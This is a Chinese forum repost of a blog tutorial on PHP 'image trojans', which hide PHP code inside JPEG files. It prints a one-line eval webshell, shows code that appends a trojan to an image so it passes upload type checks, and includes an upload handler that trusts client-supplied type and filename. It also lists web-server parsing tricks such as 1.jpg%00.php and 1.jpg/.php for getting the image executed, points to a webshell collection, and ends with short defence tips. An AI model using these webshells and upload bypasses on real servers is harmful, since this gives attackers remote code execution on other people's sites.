php图片木马实现原理

泰康之家朱经理 發表於 2020-5-27 16:16:00

<h1>什么是木马</h1>
<p>木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。</p>
<p>那,php的木马是长什么样的呢?我们来看下面这段代码:</p>
<table class="syntaxhighlighterphp" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td class="gutter">
<div class="line number1 index0 alt2">1</div>
<div class="line number2 index1 alt1">2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2"><code class="php plain"><?php</code></div>
<div class="line number2 index1 alt1"><code class="php plain">@</code><code class="php functions">eval</code><code class="php plain">(</code><code class="php variable">$_GET</code><code class="php plain">[</code><code class="php string">'tioncico'</code><code class="php plain">]);</code></div>
</div>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p>这句话的意思是什么呢?只要在网页上获取到了$_GET['tioncico']的数据,就当成php代码直接执行,例如:</p>
<p>http://test.cn/a/test.jpg/1.php?tioncico=echo%20tioncico;</p>
<p> </p>
<p>这个网页内容,我们忽略问号前面的数据,可看到tioncico=echo tioncico;%20是urlencode编码转换</p>
<p> </p>
<h1>图片木马原理</h1>
<p>在本文中,讲到的是图片木马上传,那么该怎么制作图片木马呢?</p>
<p> </p>
<p>我们首先要讲到,php上传文件的原理:</p>
<p>1:用户提交post请求,上传文件</p>
<p>2:服务器接收请求,将文件存储到临时文件</p>
<p>3:php解析该临时文件,获得文件类型,文件大小</p>
<p>4:php通过判断文件类型,进行移动临时文件到上传目录</p>
<p>5:php给前端返回上传成功,并返回地址</p>
<p> </p>
<p>在第3步,php是如果解析临时文件的呢?</p>
<p>其实,文件对自身文件内容,有着自己的文件头标识,我们只需要文件转为16进制,然后看各个文件类型对文件头的定义,就可以知道文件的类型了,例如,jpeg图片格式的文件头(2byte)标识为:0xff, 0xd8,结尾(2byte)标识为:0xff,0xd9  </p>
<p>通过读取文件的字节并转为16进制,即可知道该文件类型是什么:</p>
<table class="syntaxhighlighterphp" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td class="gutter">
<div class="line number1 index0 alt2">1</div>
<div class="line number2 index1 alt1">2</div>
<div class="line number3 index2 alt2">3</div>
<div class="line number4 index3 alt1">4</div>
<div class="line number5 index4 alt2">5</div>
<div class="line number6 index5 alt1">6</div>
<div class="line number7 index6 alt2">7</div>
<div class="line number8 index7 alt1">8</div>
<div class="line number9 index8 alt2">9</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2"><code class="php keyword">function</code> <code class="php plain">fileToHex(</code><code class="php variable">$file</code><code class="php plain">){</code></div>
<div class="line number2 index1 alt1"><code class="php spaces">    </code><code class="php keyword">if</code><code class="php plain">(</code><code class="php functions">file_exists</code><code class="php plain">(</code><code class="php variable">$file</code><code class="php plain">)){</code></div>
<div class="line number3 index2 alt2"><code class="php spaces">        </code><code class="php variable">$data</code> <code class="php plain">= </code><code class="php functions">file_get_contents</code><code class="php plain">(</code><code class="php variable">$file</code><code class="php plain">);</code></div>
<div class="line number4 index3 alt1"><code class="php spaces">        </code><code class="php keyword">return</code> <code class="php plain">bin2hex(</code><code class="php variable">$data</code><code class="php plain">);</code></div>
<div class="line number5 index4 alt2"><code class="php spaces">    </code><code class="php plain">}</code></div>
<div class="line number6 index5 alt1"><code class="php spaces">    </code><code class="php keyword">return</code> <code class="php string">''</code><code class="php plain">;</code></div>
<div class="line number7 index6 alt2"><code class="php plain">}</code></div>
<div class="line number8 index7 alt1"> </div>
<div class="line number9 index8 alt2"><code class="php functions">echo</code> <code class="php plain">fileToHex(</code><code class="php string">'F:\www\test\a\1.jpg.txt'</code><code class="php plain">);</code></div>
</div>
</td>
</tr>
</tbody>
</table>
<p>这个函数为简单实现,复杂需求需要自行查看:</p>
<p>输出:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580525491539016.png"></p>
<p> </p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580525508734262.png"></p>
<p> </p>
<p>很明显,这个图片格式为jpeg</p>
<p> </p>
<p>php在底层中已经实现了对图片格式的识别,所以无需我们额外实现,关于文件类型头部的定义,可查看:</p>
<p>https://blog.csdn.net/LiuBuZhuDeFanHua/article/details/82949144</p>
<p> </p>
<p>那么问题来了,如果我没改变文件头,然后在最后新增一串php代码,php是怎么识别类型的呢?</p>
<p>我们可以尝试下,在图片文件后面,额外写入一个php文件:</p>
<table class="syntaxhighlighterphp" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td class="gutter">
<div class="line number1 index0 alt2">1</div>
<div class="line number2 index1 alt1">2</div>
<div class="line number3 index2 alt2">3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2"><code class="php variable">$path</code> <code class="php plain">= </code><code class="php string">'F:\www\test\a\1.jpg.txt'</code><code class="php plain">;</code></div>
<div class="line number2 index1 alt1"> </div>
<div class="line number3 index2 alt2"><code class="php functions">file_put_contents</code><code class="php plain">(</code><code class="php variable">$path</code><code class="php plain">,</code><code class="php functions">file_get_contents</code><code class="php plain">(</code><code class="php string">'./a/1.php'</code><code class="php plain">),FILE_APPEND);</code><code class="php comments">//1.php是一个木马文件</code></div>
</div>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p>直接通过txt形式打开,可看到新增的数据</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580525831359024.png"></p>
<p> </p>
<p>将1.jpg图片直接打开,可发现文件没有损坏:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580525862339528.png"></p>
<p> </p>
<p> </p>
<p>通过上传文件,发现php识别的也是jpeg:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580526017930502.png">'</p>
<h1>php解析木马原理</h1>
<p>大家看以下代码,忽略php实现的东西,只看结构:</p>
<table class="syntaxhighlighterphp" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td class="gutter">
<div class="line number1 index0 alt2">1</div>
<div class="line number2 index1 alt1">2</div>
<div class="line number3 index2 alt2">3</div>
<div class="line number4 index3 alt1">4</div>
<div class="line number5 index4 alt2">5</div>
<div class="line number6 index5 alt1">6</div>
<div class="line number7 index6 alt2">7</div>
<div class="line number8 index7 alt1">8</div>
<div class="line number9 index8 alt2">9</div>
<div class="line number10 index9 alt1">10</div>
<div class="line number11 index10 alt2">11</div>
<div class="line number12 index11 alt1">12</div>
<div class="line number13 index12 alt2">13</div>
<div class="line number14 index13 alt1">14</div>
<div class="line number15 index14 alt2">15</div>
<div class="line number16 index15 alt1">16</div>
<div class="line number17 index16 alt2">17</div>
<div class="line number18 index17 alt1">18</div>
<div class="line number19 index18 alt2">19</div>
<div class="line number20 index19 alt1">20</div>
<div class="line number21 index20 alt2">21</div>
<div class="line number22 index21 alt1">22</div>
<div class="line number23 index22 alt2">23</div>
<div class="line number24 index23 alt1">24</div>
<div class="line number25 index24 alt2">25</div>
<div class="line number26 index25 alt1">26</div>
<div class="line number27 index26 alt2">27</div>
<div class="line number28 index27 alt1">28</div>
<div class="line number29 index28 alt2">29</div>
<div class="line number30 index29 alt1">30</div>
<div class="line number31 index30 alt2">31</div>
<div class="line number32 index31 alt1">32</div>
<div class="line number33 index32 alt2">33</div>
<div class="line number34 index33 alt1">34</div>
<div class="line number35 index34 alt2">35</div>
<div class="line number36 index35 alt1">36</div>
<div class="line number37 index36 alt2">37</div>
<div class="line number38 index37 alt1">38</div>
<div class="line number39 index38 alt2">39</div>
<div class="line number40 index39 alt1">40</div>
<div class="line number41 index40 alt2">41</div>
<div class="line number42 index41 alt1">42</div>
<div class="line number43 index42 alt2">43</div>
<div class="line number44 index43 alt1">44</div>
<div class="line number45 index44 alt2">45</div>
<div class="line number46 index45 alt1">46</div>
<div class="line number47 index46 alt2">47</div>
<div class="line number48 index47 alt1">48</div>
<div class="line number49 index48 alt2">49</div>
<div class="line number50 index49 alt1">50</div>
<div class="line number51 index50 alt2">51</div>
<div class="line number52 index51 alt1">52</div>
<div class="line number53 index52 alt2">53</div>
<div class="line number54 index53 alt1">54</div>
<div class="line number55 index54 alt2">55</div>
<div class="line number56 index55 alt1">56</div>
<div class="line number57 index56 alt2">57</div>
<div class="line number58 index57 alt1">58</div>
<div class="line number59 index58 alt2">59</div>
<div class="line number60 index59 alt1">60</div>
<div class="line number61 index60 alt2">61</div>
<div class="line number62 index61 alt1">62</div>
<div class="line number63 index62 alt2">63</div>
<div class="line number64 index63 alt1">64</div>
<div class="line number65 index64 alt2">65</div>
<div class="line number66 index65 alt1">66</div>
<div class="line number67 index66 alt2">67</div>
<div class="line number68 index67 alt1">68</div>
<div class="line number69 index68 alt2">69</div>
<div class="line number70 index69 alt1">70</div>
<div class="line number71 index70 alt2">71</div>
<div class="line number72 index71 alt1">72</div>
<div class="line number73 index72 alt2">73</div>
<div class="line number74 index73 alt1">74</div>
<div class="line number75 index74 alt2">75</div>
<div class="line number76 index75 alt1">76</div>
<div class="line number77 index76 alt2">77</div>
<div class="line number78 index77 alt1">78</div>
<div class="line number79 index78 alt2">79</div>
<div class="line number80 index79 alt1">80</div>
<div class="line number81 index80 alt2">81</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2"><code class="php plain"><!DOCTYPE html></code></div>
<div class="line number2 index1 alt1"><code class="php plain"><html lang=</code><code class="php string">"en"</code><code class="php plain">></code></div>
<div class="line number3 index2 alt2"><code class="php plain"><head></code></div>
<div class="line number4 index3 alt1"><code class="php spaces">    </code><code class="php plain"><meta charset=</code><code class="php string">"UTF-8"</code><code class="php plain">></code></div>
<div class="line number5 index4 alt2"><code class="php spaces">    </code><code class="php plain"><title>Document</title></code></div>
<div class="line number6 index5 alt1"><code class="php plain"></head></code></div>
<div class="line number7 index6 alt2"><code class="php plain"><body></code></div>
<div class="line number8 index7 alt1"><code class="php plain"><form action=</code><code class="php string">""</code> <code class="php plain">enctype=</code><code class="php string">"multipart/form-data"</code> <code class="php plain">method=</code><code class="php string">"post"</code> <code class="php plain">name=</code><code class="php string">"uploadfile"</code><code class="php plain">>上传文件:<input type=</code><code class="php string">"file"</code> <code class="php plain">name=</code><code class="php string">"upfile"</code><code class="php plain">/><br/></code></div>
<div class="line number9 index8 alt2"><code class="php spaces">    </code><code class="php plain"><input type=</code><code class="php string">"submit"</code> <code class="php plain">value=</code><code class="php string">"上传"</code><code class="php plain">/></code></div>
<div class="line number10 index9 alt1"><code class="php plain"></form></code></div>
<div class="line number11 index10 alt2"><code class="php plain"><?php</code></div>
<div class="line number12 index11 alt1"><code class="php keyword">if</code><code class="php plain">(@</code><code class="php functions">is_uploaded_file</code><code class="php plain">(</code><code class="php variable">$_FILES</code><code class="php plain">[</code><code class="php string">'upfile'</code><code class="php plain">][</code><code class="php string">'tmp_name'</code><code class="php plain">])){</code></div>
<div class="line number13 index12 alt2"><code class="php spaces"> </code><code class="php variable">$upfile</code><code class="php plain">=</code><code class="php variable">$_FILES</code><code class="php plain">[</code><code class="php string">"upfile"</code><code class="php plain">];</code></div>
<div class="line number14 index13 alt1"><code class="php spaces"> </code><code class="php comments">//获取数组里面的值</code></div>
<div class="line number15 index14 alt2"><code class="php spaces"> </code><code class="php variable">$name</code><code class="php plain">=</code><code class="php variable">$upfile</code><code class="php plain">[</code><code class="php string">"name"</code><code class="php plain">];</code><code class="php comments">//上传文件的文件名</code></div>
<div class="line number16 index15 alt1"><code class="php spaces"> </code><code class="php variable">$type</code><code class="php plain">=</code><code class="php variable">$upfile</code><code class="php plain">[</code><code class="php string">"type"</code><code class="php plain">];</code><code class="php comments">//上传文件的类型</code></div>
<div class="line number17 index16 alt2"><code class="php spaces"> </code><code class="php variable">$size</code><code class="php plain">=</code><code class="php variable">$upfile</code><code class="php plain">[</code><code class="php string">"size"</code><code class="php plain">];</code><code class="php comments">//上传文件的大小</code></div>
<div class="line number18 index17 alt1"><code class="php spaces"> </code><code class="php variable">$tmp_name</code><code class="php plain">=</code><code class="php variable">$upfile</code><code class="php plain">[</code><code class="php string">"tmp_name"</code><code class="php plain">];</code><code class="php comments">//上传文件的临时存放路径</code></div>
<div class="line number19 index18 alt2"><code class="php spaces"> </code><code class="php comments">//判断是否为图片</code></div>
<div class="line number20 index19 alt1"><code class="php spaces"> </code><code class="php keyword">switch</code><code class="php plain">(</code><code class="php variable">$type</code><code class="php plain">){</code></div>
<div class="line number21 index20 alt2"><code class="php spaces"> </code><code class="php keyword">case</code> <code class="php string">'image/pjpeg'</code><code class="php plain">:</code><code class="php variable">$okType</code><code class="php plain">=true;</code></div>
<div class="line number22 index21 alt1"><code class="php spaces"> </code><code class="php keyword">break</code><code class="php plain">;</code></div>
<div class="line number23 index22 alt2"><code class="php spaces"> </code><code class="php keyword">case</code> <code class="php string">'image/jpeg'</code><code class="php plain">:</code><code class="php variable">$okType</code><code class="php plain">=true;</code></div>
<div class="line number24 index23 alt1"><code class="php spaces"> </code><code class="php keyword">break</code><code class="php plain">;</code></div>
<div class="line number25 index24 alt2"><code class="php spaces"> </code><code class="php keyword">case</code> <code class="php string">'image/gif'</code><code class="php plain">:</code><code class="php variable">$okType</code><code class="php plain">=true;</code></div>
<div class="line number26 index25 alt1"><code class="php spaces"> </code><code class="php keyword">break</code><code class="php plain">;</code></div>
<div class="line number27 index26 alt2"><code class="php spaces"> </code><code class="php keyword">case</code> <code class="php string">'image/png'</code><code class="php plain">:</code><code class="php variable">$okType</code><code class="php plain">=true;</code></div>
<div class="line number28 index27 alt1"><code class="php spaces"> </code><code class="php keyword">break</code><code class="php plain">;</code></div>
<div class="line number29 index28 alt2"><code class="php spaces">    </code><code class="php plain">}</code></div>
<div class="line number30 index29 alt1"><code class="php spaces"> </code><code class="php keyword">if</code><code class="php plain">(</code><code class="php variable">$okType</code><code class="php plain">){</code></div>
<div class="line number31 index30 alt2"><code class="php spaces"> </code><code class="php comments">/**</code></div>
<div class="line number32 index31 alt1"><code class="php spaces">         </code><code class="php comments">*0：文件上传成功</code></div>
<div class="line number33 index32 alt2"><code class="php spaces"> </code><code class="php comments">*1：超过了文件大小，在php.ini文件中设置</code></div>
<div class="line number34 index33 alt1"><code class="php spaces"> </code><code class="php comments">*2：超过了文件的大小MAX_FILE_SIZE选项指定的值</code></div>
<div class="line number35 index34 alt2"><code class="php spaces"> </code><code class="php comments">*3：文件只有部分被上传</code></div>
<div class="line number36 index35 alt1"><code class="php spaces"> </code><code class="php comments">*4：没有文件被上传</code></div>
<div class="line number37 index36 alt2"><code class="php spaces"> </code><code class="php comments">*5：上传文件大小为0</code></div>
<div class="line number38 index37 alt1"><code class="php spaces">         </code><code class="php comments">*/</code></div>
<div class="line number39 index38 alt2"> </div>
<div class="line number40 index39 alt1"><code class="php spaces"> </code><code class="php variable">$error</code><code class="php plain">=</code><code class="php variable">$upfile</code><code class="php plain">[</code><code class="php string">"error"</code><code class="php plain">];</code></div>
<div class="line number41 index40 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"=======================<br/>"</code><code class="php plain">;</code></div>
<div class="line number42 index41 alt1"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"上传文件名称是："</code><code class="php plain">.</code><code class="php variable">$name</code><code class="php plain">.</code><code class="php string">"<br/>"</code><code class="php plain">;</code></div>
<div class="line number43 index42 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"上传文件类型是："</code><code class="php plain">.</code><code class="php variable">$type</code><code class="php plain">.</code><code class="php string">"<br/>"</code><code class="php plain">;</code></div>
<div class="line number44 index43 alt1"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"上传文件大小是："</code><code class="php plain">.</code><code class="php variable">$size</code><code class="php plain">.</code><code class="php string">"<br/>"</code><code class="php plain">;</code></div>
<div class="line number45 index44 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"上传后系统返回的值是："</code><code class="php plain">.</code><code class="php variable">$error</code><code class="php plain">.</code><code class="php string">"<br/>"</code><code class="php plain">;</code></div>
<div class="line number46 index45 alt1"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"上传文件的临时存放路径是："</code><code class="php plain">.</code><code class="php variable">$tmp_name</code><code class="php plain">.</code><code class="php string">"<br/>"</code><code class="php plain">;</code></div>
<div class="line number47 index46 alt2"> </div>
<div class="line number48 index47 alt1"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"开始移动上传文件<br/>"</code><code class="php plain">;</code></div>
<div class="line number49 index48 alt2"><code class="php spaces"> </code><code class="php comments">//判断up文件夹是否存在，不存在则创建</code></div>
<div class="line number50 index49 alt1"><code class="php spaces"> </code><code class="php variable">$dir</code><code class="php plain">=</code><code class="php string">'up/'</code><code class="php plain">;</code></div>
<div class="line number51 index50 alt2"><code class="php spaces"> </code><code class="php keyword">if</code><code class="php plain">(!</code><code class="php functions">is_dir</code><code class="php plain">(</code><code class="php variable">$dir</code><code class="php plain">)){</code></div>
<div class="line number52 index51 alt1"><code class="php spaces"> </code><code class="php functions">mkdir</code><code class="php plain">(</code><code class="php variable">$dir</code><code class="php plain">);</code></div>
<div class="line number53 index52 alt2"><code class="php spaces">        </code><code class="php plain">}</code></div>
<div class="line number54 index53 alt1"><code class="php spaces"> </code><code class="php comments">//把上传的临时文件移动到up目录下面</code></div>
<div class="line number55 index54 alt2"><code class="php spaces"> </code><code class="php plain">move_uploaded_file(</code><code class="php variable">$tmp_name</code><code class="php plain">,</code><code class="php string">'up/'</code><code class="php plain">.</code><code class="php variable">$name</code><code class="php plain">);</code></div>
<div class="line number56 index55 alt1"><code class="php spaces"> </code><code class="php variable">$destination</code><code class="php plain">=</code><code class="php string">"up/"</code><code class="php plain">.</code><code class="php variable">$name</code><code class="php plain">;</code></div>
<div class="line number57 index56 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"=======================<br/>"</code><code class="php plain">;</code></div>
<div class="line number58 index57 alt1"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"上传信息：<br/>"</code><code class="php plain">;</code></div>
<div class="line number59 index58 alt2"><code class="php spaces"> </code><code class="php keyword">if</code><code class="php plain">(</code><code class="php variable">$error</code><code class="php plain">==0){</code></div>
<div class="line number60 index59 alt1"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"文件上传成功啦！"</code><code class="php plain">;</code></div>
<div class="line number61 index60 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"<br/>图片预览<br/>"</code><code class="php plain">;</code></div>
<div class="line number62 index61 alt1"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"<img src="</code><code class="php plain">.</code><code class="php variable">$destination</code><code class="php plain">;</code></div>
<div class="line number63 index62 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">" alt=\"图片预览：\r文件名："</code><code class="php plain">.</code><code class="php variable">$destination</code><code class="php plain">.</code><code class="php string">"\r上传时间：\">"</code><code class="php plain">;</code></div>
<div class="line number64 index63 alt1"><code class="php spaces">        </code><code class="php plain">}</code><code class="php keyword">else</code> <code class="php keyword">if</code><code class="php plain">(</code><code class="php variable">$error</code><code class="php plain">==1){</code></div>
<div class="line number65 index64 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"超过了文件的大小，在php.ini文件中设置"</code><code class="php plain">;</code></div>
<div class="line number66 index65 alt1"><code class="php spaces">        </code><code class="php plain">}</code><code class="php keyword">else</code> <code class="php keyword">if</code><code class="php plain">(</code><code class="php variable">$error</code><code class="php plain">==2){</code></div>
<div class="line number67 index66 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"超过了文件的大小MAX_FILE_SIZE选项中设置"</code><code class="php plain">;</code></div>
<div class="line number68 index67 alt1"><code class="php spaces">        </code><code class="php plain">}</code><code class="php keyword">else</code> <code class="php keyword">if</code><code class="php plain">(</code><code class="php variable">$error</code><code class="php plain">==3){</code></div>
<div class="line number69 index68 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"文件只有部分被上传"</code><code class="php plain">;</code></div>
<div class="line number70 index69 alt1"><code class="php spaces">        </code><code class="php plain">}</code><code class="php keyword">else</code> <code class="php keyword">if</code><code class="php plain">(</code><code class="php variable">$error</code><code class="php plain">==4){</code></div>
<div class="line number71 index70 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"文件没有被上传"</code><code class="php plain">;</code></div>
<div class="line number72 index71 alt1"><code class="php spaces">        </code><code class="php plain">}</code><code class="php keyword">else</code><code class="php plain">{</code></div>
<div class="line number73 index72 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"上传文件大小为0"</code><code class="php plain">;</code></div>
<div class="line number74 index73 alt1"><code class="php spaces">        </code><code class="php plain">}</code></div>
<div class="line number75 index74 alt2"> </div>
<div class="line number76 index75 alt1"><code class="php spaces">    </code><code class="php plain">}</code><code class="php keyword">else</code><code class="php plain">{</code></div>
<div class="line number77 index76 alt2"><code class="php spaces"> </code><code class="php functions">echo</code> <code class="php string">"请上传jpg,gif,png等格式的图片"</code><code class="php plain">;</code></div>
<div class="line number78 index77 alt1"><code class="php spaces">    </code><code class="php plain">}</code></div>
<div class="line number79 index78 alt2"><code class="php plain">}</code></div>
<div class="line number80 index79 alt1"><code class="php plain">?></code></div>
<div class="line number81 index80 alt2"><code class="php plain"></body></code></div>
</div>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p>这代码很平常,也就是php+html标签的混合型代码,php会解析<?php ?>标签,进行获取并执行php标签内的代码</p>
<p>现在将这份代码换成图片+php标签:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580526212577663.png"></p>
<p> </p>
<p> </p>
<p>改后缀为php看看能不能执行成功:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580526258495611.png"></p>
<p> </p>
<p>很明显,正常运行了,php将<?php标签外的字符当成了正常字符输出,只运行了php的部分.</p>
<p> </p>
<h1>运行图片文件</h1>
<p>到现在,我们已经学会了如何给图片增加木马文件,并了解了图片木马的实现原理,那么,现在该如何在别人的网站执行这个木马呢?给图片改后缀?很明显我们办不到,那该怎么办呢?</p>
<p>我们需要借助漏洞才能执行(这就意味着木马并不是万能的,可以入侵别人的全部网站)</p>
<p>漏洞方法如下</p>
<h2>include 漏洞</h2>
<p>只要对方的php代码中存在 include xxxx ,这个xxxx可以传入外部参数的时候,</p>
<p>例如有些开发者自己实现的框架中,include controller 这个controller 有做全路径引入的时候</p>
<p> </p>
<h2>web服务器的pathinfo漏洞</h2>
<p>通过和php一起运行的web服务器存在的漏洞进行解析:下段内容参考:https://www.v2ex.com/amp/t/414740/2</p>
<p> </p>
<p>IIS6.0 的解析漏洞：1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg <br>IIS 7.0/IIS 7.5/ Nginx <8.03 畸形解析 1.jpg/.php <br>Nginx <8.03 空字节代码执行漏洞 1.jpg%00.php <br>Apache 解析漏洞 .php.一个无效后缀 <br>还有就是 Windows 下的各种截断了，因为 win 环境下不允许一些符号命名文件，所以可以造成截断文件名的效果，</p>
<p>例如本人使用phpstudy nginx/1.11.5+php7.2.10成功复现:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580527430381557.png"></p>
<p> </p>
<p> </p>
<p> </p>
<p>讲解一下,我网站中存在a/test.jpg,通过访问test.cn/a/test.jpg/1.php 被nginx成功解析a/test.jpg,并且被php调度执行成功,通过get传的tioncico=echo%20%27仙士可牛逼!%27; 参数,在php中解析成功,输出了仙士可牛逼!</p>
<p> </p>
<p>其他漏洞可以自测哦</p>
<p> </p>
<p> </p>
<h1>漏洞防范</h1>
<p>1:升级web服务器版本,尽量使用新版本</p>
<p>2:图片最好是存入oss,或者图片上传目录注意不要给执行权限(web服务器执行图片目录的权限)</p>
<p>3:图片可以的话,可以进行二次处理,把木马文件过滤掉</p>
<p>4:永远不要相信用户的输入</p>
<p> </p>
<h1>其他</h1>
<p>刚刚的eval函数木马文件,是不是觉得很简单,很容易识别?</p>
<p>并且,eval函数,可能还是被php禁用的危险函数.那么我们可以用什么呢?</p>
<p>各种木马写法,可以看 https://github.com/tioncico/webshell/tree/master/php</p>
<p>另外提一嘴,既然是可以执行php文件了,完全可以在图片文件中,include 另一个图片文件,等等</p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p class="b-h-20"> </p>
<p class="b-copyright">本文为仙士可原创文章,转载无需和我联系,但请注明来自仙士可博客www.php20.cn</p><br><br>
来源：https://www.cnblogs.com/myJuly/p/12973832.html

頁: [1]

琼殿技术论坛's Archiver

php图片木马实现原理